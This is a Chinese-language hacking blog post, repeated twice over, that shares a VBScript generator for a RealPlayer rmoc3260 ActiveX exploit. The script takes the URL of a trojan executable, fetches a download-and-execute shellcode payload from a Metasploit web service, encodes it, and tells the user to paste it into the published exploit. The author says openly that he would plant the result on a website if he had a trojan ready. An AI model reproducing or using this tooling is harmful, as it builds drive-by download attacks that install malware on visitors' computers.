milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar
以下原vbs文件:
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar
以下原vbs文件:
'
以下代码保存成vbs,双击即可
On Error Resume Next
Exeurl = InputBox ( " 请输入exe的地址: " , " 输入 " , " http://www.haiyangtop.net/333.exe " )
url = " http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL= " & URLEncoding(Exeurl) & " &MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload "
Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = " (\$shellcode \=[\s\S]+</div></pre>) "
Set Matches = Re.Execute(Body)
If Matches.Count > 0 Then Body = Matches( 0 ).value
code = Trim ( Replace ( Replace ( replace ( Replace ( Replace ( Replace ( Replace (Body, " $shellcode = " , "" ), Chr ( 34 ), "" ), Chr ( 13 ), "" ), " ; " , "" ), " </div></pre> " , "" ), Chr ( 10 ), "" ), " . " , "" ))
function replaceregex(str)
set regex = new regExp
regex.pattern = " \\x(..)\\x(..) "
regex.IgnoreCase = true
regex.global = true
matches = regex.replace(str, " %u$2$1 " )
replaceregex = matches
end Function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, " GB2312 " )
End Function
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject ( " Microsoft.XMLHTTP " )
With Retrieval
.Open " Get " , url, False , "" , ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject ( " adodb.stream " )
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len (vstrIn)
ThisChr = Mid (vStrIn,aaaa, 1 )
If Abs ( Asc (ThisChr)) < & HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc (ThisChr)
If innerCode < 0 Then
innerCode = innerCode + & H10000
End If
Hight8 = (innerCode And & HFF00) \ & HFF
Low8 = innerCode And & HFF
strReturn = strReturn & " % " & Hex (Hight8) & " % " & Hex (Low8)
End If
Next
URLEncoding = strReturn
End Function
set fso = CreateObject ( " scripting.filesystemobject " )
set fileS = fso.opentextfile( " a.txt " , 8 , true )
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
set fso = Nothing
wscript.echo Chr ( 13 ) & " ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可 "
On Error Resume Next
Exeurl = InputBox ( " 请输入exe的地址: " , " 输入 " , " http://www.haiyangtop.net/333.exe " )
url = " http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL= " & URLEncoding(Exeurl) & " &MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload "
Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = " (\$shellcode \=[\s\S]+</div></pre>) "
Set Matches = Re.Execute(Body)
If Matches.Count > 0 Then Body = Matches( 0 ).value
code = Trim ( Replace ( Replace ( replace ( Replace ( Replace ( Replace ( Replace (Body, " $shellcode = " , "" ), Chr ( 34 ), "" ), Chr ( 13 ), "" ), " ; " , "" ), " </div></pre> " , "" ), Chr ( 10 ), "" ), " . " , "" ))
function replaceregex(str)
set regex = new regExp
regex.pattern = " \\x(..)\\x(..) "
regex.IgnoreCase = true
regex.global = true
matches = regex.replace(str, " %u$2$1 " )
replaceregex = matches
end Function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, " GB2312 " )
End Function
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject ( " Microsoft.XMLHTTP " )
With Retrieval
.Open " Get " , url, False , "" , ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject ( " adodb.stream " )
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len (vstrIn)
ThisChr = Mid (vStrIn,aaaa, 1 )
If Abs ( Asc (ThisChr)) < & HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc (ThisChr)
If innerCode < 0 Then
innerCode = innerCode + & H10000
End If
Hight8 = (innerCode And & HFF00) \ & HFF
Low8 = innerCode And & HFF
strReturn = strReturn & " % " & Hex (Hight8) & " % " & Hex (Low8)
End If
Next
URLEncoding = strReturn
End Function
set fso = CreateObject ( " scripting.filesystemobject " )
set fileS = fso.opentextfile( " a.txt " , 8 , true )
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
set fso = Nothing
wscript.echo Chr ( 13 ) & " ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可 "